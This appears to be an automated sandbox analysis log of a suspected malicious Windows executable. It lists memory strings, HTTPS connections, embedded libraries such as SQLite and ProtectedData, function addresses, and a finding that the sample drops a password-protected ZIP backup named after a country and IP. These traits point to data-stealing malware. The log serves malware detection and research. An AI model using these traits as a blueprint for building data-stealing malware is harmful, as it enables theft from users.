      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
      Source: nNnzvybxiy.exeString found in binary or memory: https://www.sqlite.org/rescode.html
      Source: nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49847 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49864 version: TLS 1.2

      System Summary

      barindex
      Drops password protected ZIP file
      Source: Backup_[United States]_8.46.123.189_[1401].zip.0.drZip Entry: encrypted
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C72DF400_2_00007FFB0C72DF40
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C764FE00_2_00007FFB0C764FE0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6745100_2_00007FFB0C674510
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7225700_2_00007FFB0C722570
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C70F5D00_2_00007FFB0C70F5D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6D4CE00_2_00007FFB0C6D4CE0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69DCD00_2_00007FFB0C69DCD0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C70CD820_2_00007FFB0C70CD82
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C717CB00_2_00007FFB0C717CB0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C740CB00_2_00007FFB0C740CB0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E3D700_2_00007FFB0C6E3D70
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C74ACD00_2_00007FFB0C74ACD0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C70CD0F0_2_00007FFB0C70CD0F
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69BE100_2_00007FFB0C69BE10
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7A6E300_2_00007FFB0C7A6E30
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6CFDB00_2_00007FFB0C6CFDB0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69AE900_2_00007FFB0C69AE90
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C799DC00_2_00007FFB0C799DC0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C70CDCA0_2_00007FFB0C70CDCA
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6C8E200_2_00007FFB0C6C8E20
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6EFEF00_2_00007FFB0C6EFEF0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A8EF00_2_00007FFB0C6A8EF0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6C5EE00_2_00007FFB0C6C5EE0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C758F800_2_00007FFB0C758F80
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C713F880_2_00007FFB0C713F88
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6BAEA00_2_00007FFB0C6BAEA0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6ECF200_2_00007FFB0C6ECF20
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6800100_2_00007FFB0C680010
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7420500_2_00007FFB0C742050
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6D2FD00_2_00007FFB0C6D2FD0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A69120_2_00007FFB0C6A6912
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C71D9400_2_00007FFB0C71D940
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6AA8A00_2_00007FFB0C6AA8A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7258B00_2_00007FFB0C7258B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6F89800_2_00007FFB0C6F8980
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C67B9300_2_00007FFB0C67B930
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C727A300_2_00007FFB0C727A30
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C697A000_2_00007FFB0C697A00
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6C69D00_2_00007FFB0C6C69D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A2A900_2_00007FFB0C6A2A90
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C700A600_2_00007FFB0C700A60
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E7A300_2_00007FFB0C6E7A30
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C74FA100_2_00007FFB0C74FA10
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C67AAE60_2_00007FFB0C67AAE6
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C709AB00_2_00007FFB0C709AB0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A8B600_2_00007FFB0C6A8B60
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A4B200_2_00007FFB0C6A4B20
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C747C200_2_00007FFB0C747C20
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C678BF00_2_00007FFB0C678BF0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C672BE00_2_00007FFB0C672BE0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6AFBD00_2_00007FFB0C6AFBD0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C67FBB00_2_00007FFB0C67FBB0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C724C900_2_00007FFB0C724C90
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7A15400_2_00007FFB0C7A1540
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C74E4A00_2_00007FFB0C74E4A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7324B00_2_00007FFB0C7324B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6D85700_2_00007FFB0C6D8570
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6B45700_2_00007FFB0C6B4570
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6715300_2_00007FFB0C671530
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69A5300_2_00007FFB0C69A530
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7A05100_2_00007FFB0C7A0510
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C67A6100_2_00007FFB0C67A610
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7336300_2_00007FFB0C733630
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7366900_2_00007FFB0C736690
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E25A00_2_00007FFB0C6E25A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69F5A00_2_00007FFB0C69F5A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6FB6600_2_00007FFB0C6FB660
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6B76600_2_00007FFB0C6B7660
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6DC6500_2_00007FFB0C6DC650
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7565F00_2_00007FFB0C7565F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6956240_2_00007FFB0C695624
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7136120_2_00007FFB0C713612
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6FD6E00_2_00007FFB0C6FD6E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6F36E00_2_00007FFB0C6F36E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7347700_2_00007FFB0C734770
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E46C00_2_00007FFB0C6E46C0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6D96B00_2_00007FFB0C6D96B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C72B6B00_2_00007FFB0C72B6B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7886B00_2_00007FFB0C7886B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6FE7700_2_00007FFB0C6FE770
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6DB7600_2_00007FFB0C6DB760
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C67A7460_2_00007FFB0C67A746
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6BE8100_2_00007FFB0C6BE810
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7A88300_2_00007FFB0C7A8830
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E97F00_2_00007FFB0C6E97F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69A7F00_2_00007FFB0C69A7F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69D7F00_2_00007FFB0C69D7F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6CA7A00_2_00007FFB0C6CA7A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C75B7D00_2_00007FFB0C75B7D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7657F00_2_00007FFB0C7657F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6BD8300_2_00007FFB0C6BD830
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7458100_2_00007FFB0C745810
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C72D8100_2_00007FFB0C72D810
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6CC1000_2_00007FFB0C6CC100
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E00D00_2_00007FFB0C6E00D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6770B00_2_00007FFB0C6770B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C74017B0_2_00007FFB0C74017B
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C74D1900_2_00007FFB0C74D190
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C77D0D00_2_00007FFB0C77D0D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7560E00_2_00007FFB0C7560E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7041400_2_00007FFB0C704140
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6B41300_2_00007FFB0C6B4130
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6B91200_2_00007FFB0C6B9120
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A02100_2_00007FFB0C6A0210
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6B11F00_2_00007FFB0C6B11F0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6DE1E00_2_00007FFB0C6DE1E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6D01C00_2_00007FFB0C6D01C0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6881A00_2_00007FFB0C6881A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6932600_2_00007FFB0C693260
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7262100_2_00007FFB0C726210
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6FC2200_2_00007FFB0C6FC220
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7B12100_2_00007FFB0C7B1210
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7513200_2_00007FFB0C751320
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E03900_2_00007FFB0C6E0390
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6CD3800_2_00007FFB0C6CD380
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6EC3800_2_00007FFB0C6EC380
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7502E00_2_00007FFB0C7502E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6F63400_2_00007FFB0C6F6340
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6953230_2_00007FFB0C695323
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C78B4300_2_00007FFB0C78B430
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7B64300_2_00007FFB0C7B6430
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C77D4400_2_00007FFB0C77D440
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C69C3E00_2_00007FFB0C69C3E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6BE3E00_2_00007FFB0C6BE3E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6803D00_2_00007FFB0C6803D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6E43D00_2_00007FFB0C6E43D0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7294700_2_00007FFB0C729470
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7A94900_2_00007FFB0C7A9490
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7CF3A80_2_00007FFB0C7CF3A8
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C76C3A00_2_00007FFB0C76C3A0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C75E3B00_2_00007FFB0C75E3B0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C7383E00_2_00007FFB0C7383E0
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6A54500_2_00007FFB0C6A5450
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C6BF4400_2_00007FFB0C6BF440
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: String function: 00007FFB0C738EA0 appears 206 times
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: String function: 00007FFB0C684970 appears 110 times
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: String function: 00007FFB0C761F90 appears 31 times
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: String function: 00007FFB0C698730 appears 306 times
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEntityFramework.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1578958966.00007FF679BD4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoke.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs nNnzvybxiy.exe
